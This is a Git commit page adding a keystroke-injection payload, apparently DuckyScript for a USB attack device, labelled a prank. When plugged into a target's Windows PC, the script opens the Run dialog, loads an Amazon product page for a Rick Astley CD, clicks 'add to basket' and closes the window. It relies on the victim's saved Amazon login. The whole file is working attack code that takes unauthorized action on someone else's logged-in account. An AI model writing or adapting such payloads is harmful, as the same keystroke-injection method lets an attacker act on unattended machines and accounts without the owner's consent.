Merge pull request #66 from the-jcksn/master

Physical_Rick_Roll
pull/71/head
Darren Kitchen 2022-04-29 18:02:37 -05:00 committed by GitHub
commit 0f4d3c5d80
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
REM Title: Physical_Rick_Roll
REM Author: the-jcksn
REM Description: Adds a physical copy of "The Best of Rick Astley" CD to the target's Amazon shopping basket/cart.
REM Target: Windows
REM Version: 1.0
REM Category: Prank
REM Requires the target to be logged onto amazon with 'remember me' enabled - most people usually are...
REM Currently configured for amazon.co.uk (British) - see the minor changes required below to use on amazon.com (American)
DELAY 2000
GUI r
DELAY 200
REM ########## THIS ITEM MAY GO OUT OF STOCK, IN WHICH CASE THE PAYLOAD WILL NOT WORK - CHANGE FOR ANOTHER ITEM'S URL IF NEEDED! ##########
REM ########## FOR AMERICANS - CHANGE THIS FROM '.co.uk' TO 'com' ##########
STRING https://www.amazon.co.uk/Best-Rick-Astley/dp/B00MWPA39Y/ref=sr_1_7?crid=1DTB70Z2TNU5F&keywords=rick+astley+cd&qid=1650786996&sprefix=rick+astley+cd%2Caps%2C71&sr=8-7
DELAY 200
ENTER
DELAY 1800
CTRL f
DELAY 400
REM ########## FOR AMERICANS - CHANGE THIS TO 'add to cart' ##########
STRING add to basket
ENTER
DELAY 200
ESC
DELAY 200
TAB
DELAY 200
SHIFT TAB
DELAY 200
SPACE
DELAY 600
ALT F4